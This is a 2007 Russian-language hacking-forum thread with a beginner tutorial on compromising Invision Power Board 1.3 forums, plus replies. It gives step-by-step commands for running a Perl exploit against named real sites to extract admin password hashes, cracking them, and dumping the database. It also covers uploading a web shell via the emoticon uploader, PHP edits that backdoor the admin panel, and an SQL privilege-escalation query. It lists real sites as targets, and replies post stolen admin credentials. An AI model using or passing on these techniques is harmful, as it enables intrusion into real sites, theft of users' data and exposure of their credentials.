Простейшие способы взлома.(Начинающим)

Тема в разделе "Статьи", создана пользователем Anvil, 14 авг 2007.

  1. Anvil
    Anvil Guest
    Данная статейка писалась для новичков в нашем деле. Написать я решил её по той одной причине, чтоб люди не мучались на самом старте, так как мучался я.
    Первое время я не мог понять, что такое хак и что надо делать, чтоб ломануть сайт. Здесь я опишу самые простые способы как это сделать. Ну что начнём? Поехали…

    Хак сайта при помощи exploit'а.

    Первое что нам надо сделать, это скачать ActivePerl. Он нам пригодится и в дальнейшем.
    Скачать его мона тут:
    Код:
    h*tp://rapidshare.com/files/89358333/ActivePerl-5.8.8.822-MSWin32-x86-280952.part1.rar
    h*tp://rapidshare.com/files/89367262/ActivePerl-5.8.8.822-MSWin32-x86-280952.part2.rar
    h*tp://rapidshare.com/files/89373847/ActivePerl-5.8.8.822-MSWin32-x86-280952.part3.rar
    
    . Он нужен для запуска скриптов, написанных на языке Perl. Он является интерпретатором команд написанных в скрипте. Проще говоря, скрипт это набор команд, которые посылаются программе.

    В данном примере будет продемонстрировано, как это сделать на примере взлома форума на движке IPB 1.3. Версия относительно стара но таких в нете море, что и радует.
    Надеюсь, вы уже скачали ActivePerl. Ну и хорошо. После установки ActivePerl у нас все файлы с расширением *.pl будут открываться через него.

    Второе нам понадобится сам exploit . Он валяется тут. (Премиум аки на летит берём тут)
    Я буду писать реальный пример взлома сайта на примере hostforum.org.ru. Возможно, после того как я его ломанул эти админы дырочку уже заляпали. Но не беда, идёте в гугл и ищите такой же по его копирайту, для этого просто надо составить запрос на поиск вида: "Powered by Invision Power Board(U) v1.3 Final" (Лучше без кавычек :) ). А если вам очень понравился этот сайт и нужна его база стучите в личку. Поехали дальше.

    Поле того, как вы его скачали, положите в какую нибуть папочку. Создайте для удобства батник (Сохраните под расширением *.bat) и напишите в нём.
    Но лучше начинайте осваивать cmd (Если ещё не освоили), он вам ещё пригодится.

    Код:
    12.pl hostforum.org.ru // 1 0
    Pause
    
    Где

    12.pl – имя нашего exploit'а
    hostforum.org.ru – ну это я думаю понятно
    // - директория где расположен сам форум. В данном случае в корневом.
    1 – id юзера которого мы хотим узнать хэш. Зайди в раздел админы и посмотри их id. Этот раздел находится внизу -> Статистика форума -> и там будет Администраторы | Пользователи | Модераторы, выбирайте Администраторы, наведите курсор на админа и в переменной showuser будет его id.
    0 – приписка данного експлоита, которая выбирает версию форума.
    ( 0 - IPB 1.* 1 - IPB 2.* (до версии 2.0.4) )
    После того как определились с параметрами, запускаем его.


    Пример запуска из cmd

    Жмёте Win + R.

    В командной строке набираем:
    C:\путь_к_Perl C:\путь_к_файлу_exploit'а.pl сайт /папка_с_форумом/ 1 0

    где:
    C:\путь_к_Perl - это путь к файлу интерпретатора, например c:\perl\bin\perl (Если он проинсталирован отдельно то можно просто "perl")

    C:\путь_к_файлу_exploit'а.pl - путь к сохраненному вами файлу с кодом сплоита

    сайт - сайт форума.

    папка_с_форумом - папка на сервере, куда установлен движок форума (смотрите в строке URL броузера)

    1 - id юзера, чей хеш мы хотим увести. т.к. нам нужны админские хеши, ставим единицу, потому что первыми на форуме регистрируюца естественно админы (Но не всегда)

    0 - версия форума которую мы хотим взломать (0 - IPB 1.*, 1 - IPB 2.*)

    Строка в cmd будет выглядеть примерно так:
    c:\perl\bin\perl c:\ipb.pl hostforum.org.ru // 1 0

    Ждём примерно минутку…..

    И о чудо, если эту дырку не заляпали, вы увидите нечто такое:

    [~] SERVER : hostforum.org.ru
    [~] PATH : //
    [~] MEMBER ID : 1
    [~] TARGET : 0 - IPB 1.*
    [~] SEARCHING PASSWORD ... [ DONE ]

    MEMBER ID : 1
    PASSWORD : 4ca4fa2580c625262f789960bfe0edeb

    4ca4fa2580c625262f789960bfe0edeb – это то что нам и нужно было.

    Теперь берём какой либо брутфорс md5 hash и брутим.
    Брутить можно разными программами. Это дело вкуса. Вот небольшой список:
    http://the-udc.com/rus/
    http://rapidshare.com/files/89122993/passwordspro.rar - я пользуюсь этим.
    http://www.openwall.com/john/
    и т.д.

    А лучше посетите какие либо онлайн поисковики md5 hash. В целях избежания засорения статьи лежит тут. И ищем его там.

    А ели вы все-таки решили воспользоваться простым брутфорсом, тогда могу посоветовать для удобства одну Perl утилиту. Она тут. + ЭТО
    Пользоваться ей очень легко, составляем батник с параметрами:

    Код:
    1.pl 1.sql 3-4
    Pause
    
    Где
    1.sql – имя или пут к базе
    3-4 – колонки который нам надо выдрать (Можно выдирать только одну, для составления листов hash и mail для спама, или несколько перечисляя их через ”-”)
    После чего в папке будет лежать фаил с выдранным.

    А если у вас hash не сбрутился советую сходить в раздел Расшифровка хэшей и немного о них самих. Там всегда найдутся добрые люди, которые помогут.

    После того как мы его нашли, узнаём логин админа (Там, где и его id).
    После чего заходим в админку и сливаем базу. Или шалим на форуме, но помните, нормальный хакер не станет без нужды удалять базу . Помните что этот форум каму-то очень нужен. А вообще не мне вам читать проповеди.

    После того как слили базу у вас в руках есть куча чужих мыл, которые можно читать (Ох как люблю я это делать, там иногда мона найти, что нибуть вкусненькое. Например зарегенный на него ак от чего либо ценного). Помимо того после расшифровки предложенных нам хэшей, мона получить сайты, icq, хост и т.п.

    Кроме слитой база мы также можем сделать следующее:

    1. Залить шелл.

    Заходим под админом (как стать админом написано выше : ) )
    Далее заходим в "Administration(Администрирование)" жмем "Manage Emoticons(Управление смайлами)" опускаем страницу вниз и видим такую строку "Upload an Emoticon to the emoticons directory(Загрузить смайл в его директорию)" жмем кнопку "Browse(Обзор)" и выбираем у себя на компе шелл, загружается он в папки в зависимости от версии:
    1.3 /forum/html/emoticons/shell.php
    2.* /forum/style_emoticons/default/shell.php
    где shell.php имя вашего загруженного шелла.

    2. Делаем сваю дырку для дальнейшего использования.

    Представь что ты сидел и ломал этот форум. А тут пришёл злобный админ и сменил пас а то и хуже, залатал дырку.
    Но не тут то было, если вы успели сделать то, что написано ниже.
    То что нам надо так это маленько подправить родной код движка. Для этого:

    1. найди строчку 392, в ней должно быть следующее:
    PHP:
    if ($GROUP['g_access_cp'] != 1)
    {
    do_login("You do not have access to the administrative CP");
    }
    else
    {
    $session_validated = 1;
    $this_session = $row;
    }
    её надо заменить на
    PHP:
    if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1)
    {

    $session_validated = 1;
    $this_session = $row;
    }
    Потом найди строчку 442, в ней будет:

    PHP:
    if ($GROUP['g_access_cp'] != 1)
    {
    do_login("You do not have access to the administrative CP");
    }
    else
    {

    //----------------------------------
    // All is good, rejoice as we set a
    // session for this user
    //----------------------------------

    $sess_id = md5( uniqid( microtime() ) );
    И замени на
    PHP:

    if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1)

    {

    //----------------------------------
    // All is good, rejoice as we set a
    // session for this user
    //----------------------------------

    $sess_id = md5( uniqid( microtime() ) );
    И последнее
    Найди в файле sources/Admin/ad_mysql.php строчку

    PHP:
    if ($MEMBER['mgroup'] != $INFO['admin_group'])
    {
    $ADMIN->error("Sorry, these functions are for the root admin group only");
    }
    И удали её.

    Всё готово, теперь в админку может заходить любой пользователь без прав админа. :)

    Получить админа мона с помощью sql инъекции. (Как делать их, почитаешь в другом разделе.)

    Достаточно составить запрос на изменение вашей группы:
    UPDATE `ibf_members` SET `mgroup`=4 WHERE `id` =наш_id;
    Всё, теперь ваш юзер уже является чистокровным админом. :)


    Удачи!!!

    З.Ы.

    Тренировочные площадки. (По мере нахождения буду добавлять новые.) :

    tomatomobile.ru
    forum.aceweb.ru
    www.ru-forum.com
    forum.ishim.info
    www.flame.ws
    www.sanktrum.ru
    www.cadpointbg.com
    sosnogorsk.ru
    gorsovet.rikt.ru
    forum.nsawt.ru
    www.computerland.odessa.ua
    www.vumo98.ru

    Если у вас получилось, отписывайтесь. (Если не получилось тоже)
    Так же, просьба отписываться, вот так.

    Код:
    http://gorsovet.rikt.ru/forum/
    id: 1
    hash: 21232f297a57a5a743894a0e4a801fc3
    login: admin
    password: admin  (Если не удалось расшифровать то оставить пустым)
    
    Это на тот случай, чтоб люди не ломали одно и тоже по десять раз.

    Если вы поняли сам принцип использования сплоитов И хотите использовать новые, прошу сюда:
    http://www.securitylab.ru/
    milw0rm.com




    З.З.Ы. Пишите, если что-то надо добавить.
     
    Последнее редактирование модератором: 11 фев 2009
    14 авг 2007
    6 пользователям это понравилось.
  2. Koller
    Koller Guest
    Эх...были времена...с этими форумами...​


    Начнем по порядку:

    1) Не буду говорить про орфографию...(експлоит и т.д.)
    2) "идёте в гугл и ищите такой же по его копирайту" - можно было бы привести пример...
    например: введите в гугле "Powered by Invision Power Board(U) v1.3 Final"...ведь статья для самых начинающих...
    3) Создать батник для удобства? Имхо лучше будет, если люди начнут привыкать к cmd (коммандной строке), потому как в будущем им всем пригодится...и тут есть еще один момент - иногда приходится указывать полный путь к сплойту...и будет нечто: perl С:/hack/123.pl + параметры...
    4) Посмотреть id админов...ты написал про "Зайди в раздел админы"...это где там такой?...есть index.php?act=Members, где можно отфильтровать пользователей по группам...например показать одних тех же самых администраторов...
    5) Я бы добавил еще пару вариантов использования сплойта...
    6) Про брут хеша - можно было указать и наш раздел форума...мол Вам его и тут могут попробывать сбрутить...
    7) Забыл указать программы для брута хешей...
    8) Скриптом выдернуть из sql как один из вариантов...но ведь можно было привести и другие примеры...например запросом к бд SELECT concat(name,":",password) FROM ibf_members...можно добавить конечно INTO OUTFILE 'полный_путь_до_файла_куда_сохранить.txt' и он вам все это сохранит в файле нужном, но это редко когда срабатывает...
    9) На счет скули - лишнее...
    10) Добавил бы еще ссылок на бажные форумы, чтобы люди могли потренироваться...
    11) И не написано в кратце про то, что еще можно "поиметь" со взлома...заливка шелла, чтение конфигурационных файлов с логином и паролем к БД, заливка утилитки от рст для БД (не обязательно, но сам ею пользуюсь)...

    Я может все-таки не должен был себе позволять так критиковать статью...но все-таки позволил...
    Статью удалять не надо...его просто нужно переделать имхо...
    А так...за старания молодец...

    P.s. оформить хорошенько тоже было бы не плохо...
     
    14 авг 2007
  3. Anvil
    Anvil Guest
    Koller: За критику спс, критиковать ты умееш. Не то что некоторые. Типо
    "Фуфло, г*вно, да руки бы ему плд тромвай".
    Подписываюсь под всем.
    Пошол переделовать.

    Добавлено через 1 час 42 минуты
    Koller:
    Всё. Потправил.
    Посмотри. Что ещё добавить, потправить?
     
    Последнее редактирование модератором: 14 авг 2007
    14 авг 2007
  4. Koller
    Koller Guest
    Свяжись со мной по асе...ближе к вечеру по мск. времени...
     
    15 авг 2007
  5. Exit
    Exit Guest
    напишите пожалуйста статью про иньекции
     
    11 сен 2007
    1 человеку нравится это.
  6. wildmouse
    wildmouse Guest
    все хорошо но где же
    афтар не несет ни какой ответственности бла бла бла
    свертесь с законом
    и статья в исключительно обучающих целях для повышения безопасности бла бла бла
     
    11 сен 2007
  7. elman
    elman Guest
     
    11 сен 2007
  8. Anvil
    Anvil Guest
    Я не стал это писать по причини того что я нису ответственность. :)
    И плюс ко всему я живу в РБ и у нас нету конкретно сформулированого закона на счёт хакеров.
    З.Ы. И вобще из нозвания и так понятно что она для ознакомительных целей. :)
     
    24 сен 2007
  9. Хел
    Хел Guest
    29 сен 2007
  10. danone
    danone Новичок
    Симпатии:
    0
    Anvil, может я чего не понимаю, но когда я делаю через cmd то после отработки программы все исчезает с экрана.... а когда создаю батник он выдает

    C:\1.pl moto3g.freeland.ru // 1 0
    Системе не удается найти указанный путь.

    может подскажет кто, что не так?!
     
    31 окт 2007
  11. Anvil
    Anvil Guest
    Разобрались по аске.
     
    1 ноя 2007
  12. Anvil
    Anvil Guest
    karas,
    Не читай только последнюю страницу.
    Эта моя статья.
    И если даже читаеш последнее сообщение то читай внимательнее, я написал "Разобрались по аске." - это значит что я с этим человеком разобрался по аске, и всё у него заработало.
    P.S. Всё что ты написал есть в статье. И про pause тоже.
     
    4 ноя 2007
  13. reZon
    reZon Guest
    Код:
    http://forum.russned.ru
    id: 1
    hash: 5fc4440341898d6cf67b0d9484e40ff9
    login: fadmin
    password: dove1090
    
     
    13 дек 2007
    2 пользователям это понравилось.
  14. Karbel
    Karbel Новичок
    Симпатии:
    0
    Подскажите пожалуйса, вобщем я всё сделал, зашёл под админом, слил базу, и теперь хочу отредактирвать код движка(как сказано в статье), но где мне его взять(код движка)?
    P.S Извените за тупой вопрос!
     
    22 дек 2007
  15. Хел
    Хел Guest
    Karbel,
    через шелл...
     
    22 дек 2007
  16. Karbel
    Karbel Новичок
    Симпатии:
    0
    Какой шелл вы посоветуете или киньте пожалуйста ссылку на тему в форуме, если вас это не затруднит...
     
    22 дек 2007
  17. Хел
    Хел Guest
    Karbel,
    шелл можно абсолютно любой....

    я лично модернизированный р57 Электом с ачата юзаю...
     
    22 дек 2007
  18. Karbel
    Karbel Новичок
    Симпатии:
    0
    Жестокие вы люди, на форуме кидать шелы с условием от 50 сообщений, если не трудно - кинь ссылку на тему, где их мжно достать!
     
    Последнее редактирование: 22 дек 2007
    22 дек 2007
  19. wriwel
    wriwel Guest
    в поисковике(ya.ru, google.com) поищи.. блин, на каждом шагу валяются...
     
    22 дек 2007
  20. Karbel
    Karbel Новичок
    Симпатии:
    0
    А через что заливать шел, если ни через смайлы? Посоветуйте, плиз.
     
    22 дек 2007
Загрузка...